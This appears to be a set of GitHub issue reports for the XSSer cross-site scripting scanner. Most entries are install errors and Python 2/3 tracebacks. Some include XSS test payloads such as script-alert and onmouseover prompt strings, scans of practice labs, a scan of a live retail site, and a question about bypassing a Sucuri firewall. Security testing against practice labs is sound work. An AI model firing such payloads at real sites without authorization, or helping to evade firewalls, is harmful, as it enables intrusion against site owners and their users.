
`

When i run the xsser in my python3.7 , an error occurred

File "D:\tool\xsser\core\curlcontrol.py", line 454, in info
m['content-type'] = (self.handle.getinfo(pycurl.CONTENT_TYPE)).strip( ';')
TypeError: decoding to str: need a bytes-like object, NoneType found

How could i resolve this? i think it is a compatibility issues between py2.x and py3.x.

Describe the bug

xsser shows: You have found: [ 4 ] XSS vector(s)! -> [100% VULNERABLE]

This is one of it from the 4 detected.
example:

[+] Target: https://www.thiswebsite.com/blablabla??countryName=Default&default%27b%27Country=XSS
[+] Vector: [ default'b'Country ]
[!] Method: URL
[] Hash: c43a28532b76082519cb67ffe92794ca
[] Payload: https://www.thiswebsite.com/blablabla?countryName=Default&default%27b%27Country=%22%3Ec43a28532b76082519cb67ffe92794ca
[!] Vulnerable: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[!] Status: XSS FOUND!

so i copied the entire link from above(website name changed) and pasted on browser. I do not see anything change. The website loads normal but i don't see any vulnerability on the website.

https://www.thiswebsite.com/blablabla?countryName=Default&default%27b%27Country=%22%3Ec43a28532b76082519cb67ffe92794ca

To Reproduce
1 . $xsser -u https://www.thiswebsite/ -c 20 --Cl --reverse-check

Expected behavior
should be able to see the vulnerability on the website modified.

Screenshots
If applicable, add screenshots to help explain your problem.

Running environment:

• XSSer version - 1.8.2
• Installation method - git
• Operating system: - 5.4.0-2parrot1-amd64
• Python version - Python 3.7.5 & Python 2.7.17

Target details:

• XSS techniques found by xsser [e.g. DOM-Based XSS]
• WAF/IPS [if any]
• Relevant console output [if any]
• Exception traceback [if any]

Additional context
Add any other context about the problem here.

Describe the bug
Cannot install XSSer on Kali 2019.4

To Reproduce

1. Run git clone git clone https://code.03c8.net/epsylon/xsser
2. Run python setup.py install
3. Run apt-get install python3-pycurl python3-bs4 python3-geoip python3-geoip2 python3-cairocffi
4. Run xsser -h

Error

root@VB-Unkl3K4L1:~/Desktop/HellRoom/xsser# xsser -h
Traceback (most recent call last):
  File "/usr/local/bin/xsser", line 4, in <module>
    __import__('pkg_resources').run_script('xsser==1.8', 'xsser')
  File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 666, in run_script
    self.require(requires)[0].run_script(script_name, ns)
  File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 1462, in run_script
    exec(code, namespace, namespace)
  File "/usr/local/lib/python2.7/dist-packages/xsser-1.8-py2.7.egg/EGG-INFO/scripts/xsser", line 22, in <module>
    from core.main import xsser
  File "/usr/local/lib/python2.7/dist-packages/xsser-1.8-py2.7.egg/core/main.py", line 22, in <module>
    import os, re, sys, datetime, hashlib, time, urllib.request, urllib.parse, urllib.error, cgi, traceback, webbrowser, random
ImportError: No module named request

Expected behavior
To be shown XSSer help page.

Running environment:

• XSSer version [1.8.2]
• Installation method [git clone]
• Operating system: [Kali Linux 2019.4 26 November 2019 x64 bit]
• Python version [2.7.17]

Additional context
Fresh Kali install.

Hello, can you bypass the Sucuri WFA ?

I tried to check after the latest update .
python3 xsser --auto -u "http://testphp.vulnweb.com/search.php?test=query" -p "searchFor=XSS&goButton=go" --reverse-check

and in the mean time , I am doing tcpdump on port 19084 .

and I am not able to capture any packet. Is this normal ?

I have also tried python3 xsser --auto -u "https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS" --reverse-check . There are less results now but no packets received .

OS : kali linux 2019

xsser --gtk

Traceback (most recent call last): File "/usr/local/bin/xsser", line 4, in <module> __import__('pkg_resources').run_script('xsser==1.7', 'xsser') File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 666, in run_script self.require(requires)[0].run_script(script_name, ns) File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 1446, in run_script exec(code, namespace, namespace) File "/usr/local/lib/python2.7/dist-packages/xsser-1.7-py2.7.egg/EGG-INFO/scripts/xsser", line 24, in <module> from core.main import xsser File "/usr/local/lib/python2.7/dist-packages/xsser-1.7-py2.7.egg/core/main.py", line 35, in <module> from core.curlcontrol import Curl File "/usr/local/lib/python2.7/dist-packages/xsser-1.7-py2.7.egg/core/curlcontrol.py", line 24, in <module> import os, urllib, mimetools, pycurl, re, time, random ImportError: No module named pycurl

Hey there,

I'm trying to test my application with your tool, but I'm stuck on this error:

Traceback (most recent call last):
  File "/Users/..../xsser-public/xsser-public/core/main.py", line 1437, in try_running
    return func(*args)
  File "/Users/..../xsser-public/xsser-public/core/main.py", line 285, in get_payloads
    payloads_css    = core.fuzzing.vectors.vectors_css
AttributeError: 'module' object has no attribute 'vectors_css'

Any idea what's going wrong?

this is what i use:
xsser -u 'http://127.0.0.1/DVWA/vulnerabilities/xss_r' -p 'txtName=123&btnSign=Sign+Guestbook&mtxMessage=123' --cookie='security=medium; PHPSESSID=v22q9j23m3f7i1nk15favvfg72' --auto --heuristic --threads 30 --timeout 30 --retries 1 --delay 0 --follow-redirects

error log:(use DVWA for test xsser)

===========================================================================
Target: http://127.0.0.1/DVWA/vulnerabilities/xss_r/ --> 2016-08-10 13:31:31.291877
===========================================================================

---------------------------------------------
[-] Hashing: b971c643cf9456ca02083186fa9192bf
[+] Trying: <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="b971c643cf9456ca02083186fa9192bf">x</button>
[+] Browser Support: [Not Info]
[-] Injection Results:

XSSer is not working propertly!:
 - Is something blocking connection(s)?
 - Is target url ok?: (http://127.0.0.1/DVWA/vulnerabilities/xss_r/)

this is result:

[*] Final Results:

• Injections: 581
• Failed: 581
• Sucessfull: 0
• Accur: 0 %

I have a problem :
Traceback (most recent call last):
File "xsser", line 22, in
from core.main import xsser
File "/root/xsser/core/main.py", line 38, in
from core.crawler import Crawler
File "/root/xsser/core/crawler.py", line 33, in
from BeautifulSoup import BeautifulSoup
ImportError: No module named BeautifulSoup

I changed crawler.py from BeautifulSoup to bs4 but the problem still there , any idea ? Thanks

XSSER is not working with the latest version of Beautiful Soup

I am trying to use xsser against dvwa but it looks like it is not working properly.

I am executing:
xsser -u "http://localhost/vulnerabilities/xss_r/" -g "?name=" --cookie="PHPSESSID=rq8fvbrqv2pvr4ob622joj99s3; security=low" --proxy http://localhost:8080 --auto

I am using Burp as proxy to capture the requests and I have observed that when xsser request:
GET /vulnerabilities/xss_r//?name= HTTP/1.1
Host: localhost
User-Agent: Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)
Cookie: PHPSESSID=rq8fvbrqv2pvr4ob622joj99s3; security=low
Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg
Connection: close
Content-type: application/x-www-form-urlencoded; charset=UTF-8

and when the response arrive, in terminal is printed:

[-] Hashing: 9ab07af70c1a97ea93f18b2fe7400b35
[+] Trying: http://localhost/vulnerabilities/xss_r//?name=
[+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[+] Checking: url attack with "><SCRIPT>alert('PAYLOAD')</SCRIPT>... fail

So, you can see that xsser has never sent the payload that was supposed to be sent.
This is happening with each payload.

Hi, is it possible with xsser to automatically send payloads within request headers?

One example could be to change the HTTP User-Agent header in a request and send it. The reason I ask is because there are many applications and software packages out there which store such info within their database structure, therefore opening themselves to stored XSS vulnerabilities.

By the look of the parameters which the tool provides I didn't see anything related to this, or am I missing something?

Thanks!

Hello. I apologize for my bad english.
Xsser is great tool, but I have a problem with cookie injection. Xsser for some reason makes an injection simultaneously in cookie and in URL.
Thats my command
xsser -u "http://127.0.0.1/mutillidae/index.php?page=capture-data.php" --Coo --payload="<script>alert(1);</script>" --proxy "http://127.0.0.1:8080"

Thats request

• GET /mutillidae/index.php?page=capture-data.php/<script>alert(1);</script> HTTP/1.1
• Host: 127.0.0.1
• User-Agent: PycURL/7.43.0 libcurl/7.57.0 GnuTLS/3.5.16 zlib/1.2.8 libidn2/2.0.4 libpsl/0.19.1 (+libidn2/2.0.4) libssh2/1.8.0 nghttp2/1.29.0 librtmp/2.3
• Cookie: <script>alert('ed4f8f4e6fd63504d0e2bd84c1860637')</script>

I tried many variations, otherwise I would not have written here.
My questions are not answered by Google. What am I doing wrong?

Reverse-check steop is not executed for some reason after finding possible xss vector, XSSER 1.8.3 version .

To Reproduce
python3 xsser --auto -u "http://testphp.vulnweb.com/search.php?test=query" -p "searchFor=XSS&goButton=go" --reverse-check

The script finished likes this :

[*] Final Results:

• Injections: 1291
• Failed: 4
• Successful: 1287
• Accur: 99.69016266460109 %

[*] List of XSS injections:
-> CONGRATULATIONS: You have found: [ 1287 ] possible XSS vectors! ;-)
[Info] Aborting large screen output. Generating auto-report at: [ XSSreport.raw ] ;-)

.